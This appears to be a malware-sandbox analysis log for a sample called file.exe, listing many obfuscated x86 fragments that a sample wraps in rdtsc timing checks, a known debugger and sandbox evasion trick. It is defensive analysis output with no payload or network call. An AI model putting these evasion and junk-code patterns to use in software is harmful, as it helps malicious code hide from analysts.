Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 497020E second address: 49702A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEE1507F26Ch 0x00000013 sbb ch, 00000068h 0x00000016 jmp 00007FEE1507F26Bh 0x0000001b popfd 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FEE1507F276h 0x00000023 add cx, 70C8h 0x00000028 jmp 00007FEE1507F26Bh 0x0000002d popfd 0x0000002e mov dl, al 0x00000030 popad 0x00000031 popad 0x00000032 mov esi, dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 mov ecx, edx 0x00000038 pushfd 0x00000039 jmp 00007FEE1507F26Dh 0x0000003e adc si, E1E6h 0x00000043 jmp 00007FEE1507F271h 0x00000048 popfd 0x00000049 popad 0x0000004a xchg eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49702A3 second address: 49702A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49702A7 second address: 49702AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49702AD second address: 497037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEE1472CB5Bh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 movzx eax, bx 0x00000014 mov eax, ebx 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007FEE1472CB63h 0x0000001e je 00007FEE86CEAE7Fh 0x00000024 jmp 00007FEE1472CB66h 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 jmp 00007FEE1472CB60h 0x00000035 je 00007FEE86CEAE62h 0x0000003b pushad 0x0000003c push eax 0x0000003d pop edx 0x0000003e pushfd 0x0000003f jmp 00007FEE1472CB66h 0x00000044 sbb ecx, 6C9ACF08h 0x0000004a jmp 00007FEE1472CB5Bh 0x0000004f popfd 0x00000050 popad 0x00000051 mov edx, dword ptr [esi+44h] 0x00000054 pushad 0x00000055 pushad 0x00000056 mov edi, eax 0x00000058 mov ax, C64Dh 0x0000005c popad 0x0000005d mov ebx, esi 0x0000005f popad 0x00000060 or edx, dword ptr [ebp+0Ch] 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jmp 00007FEE1472CB61h 0x0000006b push esi 0x0000006c pop edx 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 497037B second address: 4970402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 25DCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test edx, 61000000h 0x00000012 jmp 00007FEE1507F26Bh 0x00000017 jne 00007FEE8763D556h 0x0000001d jmp 00007FEE1507F276h 0x00000022 test byte ptr [esi+48h], 00000001h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FEE1507F26Dh 0x0000002f sub esi, 111FDB96h 0x00000035 jmp 00007FEE1507F271h 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FEE1507F270h 0x00000041 add cl, FFFFFFB8h 0x00000044 jmp 00007FEE1507F26Bh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960790 second address: 4960814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEE1472CB61h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007FEE1472CB5Ch 0x00000016 mov bl, ch 0x00000018 pop edx 0x00000019 jmp 00007FEE1472CB5Ch 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FEE1472CB60h 0x00000026 and esp, FFFFFFF8h 0x00000029 jmp 00007FEE1472CB60h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007FEE1472CB5Dh 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960814 second address: 4960851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007FEE1507F26Ch 0x00000011 pop eax 0x00000012 mov bx, 6C06h 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FEE1507F26Dh 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f movzx ecx, di 0x00000022 push eax 0x00000023 push edx 0x00000024 movsx ebx, cx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960851 second address: 496089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEE1472CB5Bh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov ax, 32ABh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FEE1472CB5Eh 0x0000001e sbb esi, 157D9838h 0x00000024 jmp 00007FEE1472CB5Bh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496089B second address: 496091D instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FEE1507F272h 0x00000010 sub ebx, ebx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 pushfd 0x00000016 jmp 00007FEE1507F273h 0x0000001b xor si, 2B5Eh 0x00000020 jmp 00007FEE1507F279h 0x00000025 popfd 0x00000026 popad 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov eax, edi 0x0000002e pushfd 0x0000002f jmp 00007FEE1507F26Fh 0x00000034 jmp 00007FEE1507F273h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496091D second address: 4960922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960922 second address: 4960969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 7659A1B8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FEE87644CC6h 0x00000012 jmp 00007FEE1507F277h 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEE1507F275h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960969 second address: 496099C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE1472CB68h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496099C second address: 49609AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49609AB second address: 49609B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49609B1 second address: 49609B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49609B5 second address: 49609F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEE86CF253Ch 0x0000000e jmp 00007FEE1472CB67h 0x00000013 test byte ptr [76FB6968h], 00000002h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEE1472CB65h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49609F8 second address: 49609FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49609FE second address: 4960A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960A02 second address: 4960A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960A06 second address: 4960A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FEE86CF24FEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEE1472CB62h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960A28 second address: 4960A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d jmp 00007FEE1507F270h 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEE1507F277h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960A66 second address: 4960AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B932h 0x0000000f pushfd 0x00000010 jmp 00007FEE1472CB63h 0x00000015 and ecx, 5A9B3B2Eh 0x0000001b jmp 00007FEE1472CB69h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FEE1472CB5Eh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960AD4 second address: 4960AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960AF1 second address: 4960B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEE1472CB60h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960B11 second address: 4960B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960B15 second address: 4960B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960B1B second address: 4960B42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FEE1507F275h 0x0000000e push dword ptr [ebp+14h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960B42 second address: 4960B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960B89 second address: 4960C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 jmp 00007FEE1507F270h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esp, ebp 0x00000010 jmp 00007FEE1507F270h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FEE1507F26Dh 0x0000001f adc cl, FFFFFFB6h 0x00000022 jmp 00007FEE1507F271h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FEE1507F270h 0x0000002e jmp 00007FEE1507F275h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4970B8F second address: 4970BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4970BAA second address: 4970BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4970BB0 second address: 4970BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E051D second address: 49E0572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE1507F271h 0x00000009 jmp 00007FEE1507F26Bh 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEE1507F272h 0x0000001c and ch, 00000058h 0x0000001f jmp 00007FEE1507F26Bh 0x00000024 popfd 0x00000025 mov ch, 95h 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0572 second address: 49E0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0578 second address: 49E057E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E057E second address: 49E0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E031A second address: 49E031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E031E second address: 49E0324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0324 second address: 49E0356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F274h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEE1507F277h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0356 second address: 49E03C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 mov si, 44C7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FEE1472CB5Dh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov di, si 0x00000017 pushfd 0x00000018 jmp 00007FEE1472CB68h 0x0000001d jmp 00007FEE1472CB65h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEE1472CB68h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E03C3 second address: 49E03C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498014C second address: 4980152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980152 second address: 498016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1507F279h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498016F second address: 498017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498017E second address: 4980184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980184 second address: 498019B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov edi, 617717CCh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498019B second address: 498019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498019F second address: 49801BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49801BB second address: 49801D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, A9A9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov ah, bl 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49801D2 second address: 49801D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49801D8 second address: 49801DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49801DC second address: 4980222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEE1472CB64h 0x00000013 jmp 00007FEE1472CB65h 0x00000018 popfd 0x00000019 pushad 0x0000001a mov esi, 70957FDDh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E07B8 second address: 49E07D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 12A55422h 0x00000008 mov bx, 906Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEE1507F26Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E07D5 second address: 49E0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEE1472CB5Fh 0x00000008 pop esi 0x00000009 call 00007FEE1472CB69h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FEE1472CB5Dh 0x0000001a jmp 00007FEE1472CB5Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 mov esi, edx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov esi, edx 0x0000002c mov si, di 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0831 second address: 49E0875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEE1507F26Eh 0x00000013 and cx, A308h 0x00000018 jmp 00007FEE1507F26Bh 0x0000001d popfd 0x0000001e mov cx, 457Fh 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E08C8 second address: 49E08DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E08DF second address: 49E0946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b movzx eax, al 0x0000000e pushad 0x0000000f push eax 0x00000010 pushfd 0x00000011 jmp 00007FEE1507F273h 0x00000016 adc cx, 417Eh 0x0000001b jmp 00007FEE1507F279h 0x00000020 popfd 0x00000021 pop eax 0x00000022 mov ah, dh 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edx, 331F0C78h 0x0000002e mov esi, edx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0946 second address: 49E0963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCC1A second address: 11FCC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990405 second address: 499042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 35897B9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499042F second address: 4990434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990434 second address: 4990461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 3677h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007FEE1472CB69h 0x00000011 push FFFFFFFEh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990461 second address: 4990465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990465 second address: 499046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499046B second address: 49904BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 197CE947h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 0B10E381h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FEE1507F270h 0x00000019 sbb ax, 0728h 0x0000001e jmp 00007FEE1507F26Bh 0x00000023 popfd 0x00000024 call 00007FEE1507F278h 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49904BA second address: 49904D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49904D5 second address: 49905FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7DE92399h 0x0000000f jmp 00007FEE1507F275h 0x00000014 push 72E08371h 0x00000019 jmp 00007FEE1507F277h 0x0000001e xor dword ptr [esp], 04102D71h 0x00000025 jmp 00007FEE1507F276h 0x0000002a mov eax, dword ptr fs:[00000000h] 0x00000030 pushad 0x00000031 mov bx, si 0x00000034 movzx ecx, bx 0x00000037 popad 0x00000038 push edx 0x00000039 jmp 00007FEE1507F272h 0x0000003e mov dword ptr [esp], eax 0x00000041 pushad 0x00000042 movzx ecx, di 0x00000045 jmp 00007FEE1507F273h 0x0000004a popad 0x0000004b sub esp, 1Ch 0x0000004e jmp 00007FEE1507F276h 0x00000053 xchg eax, ebx 0x00000054 jmp 00007FEE1507F270h 0x00000059 push eax 0x0000005a jmp 00007FEE1507F26Bh 0x0000005f xchg eax, ebx 0x00000060 jmp 00007FEE1507F276h 0x00000065 xchg eax, esi 0x00000066 jmp 00007FEE1507F270h 0x0000006b push eax 0x0000006c jmp 00007FEE1507F26Bh 0x00000071 xchg eax, esi 0x00000072 jmp 00007FEE1507F276h 0x00000077 xchg eax, edi 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FEE1507F26Ah 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49905FE second address: 4990604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990604 second address: 4990628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE1507F26Dh 0x00000013 rdtsc
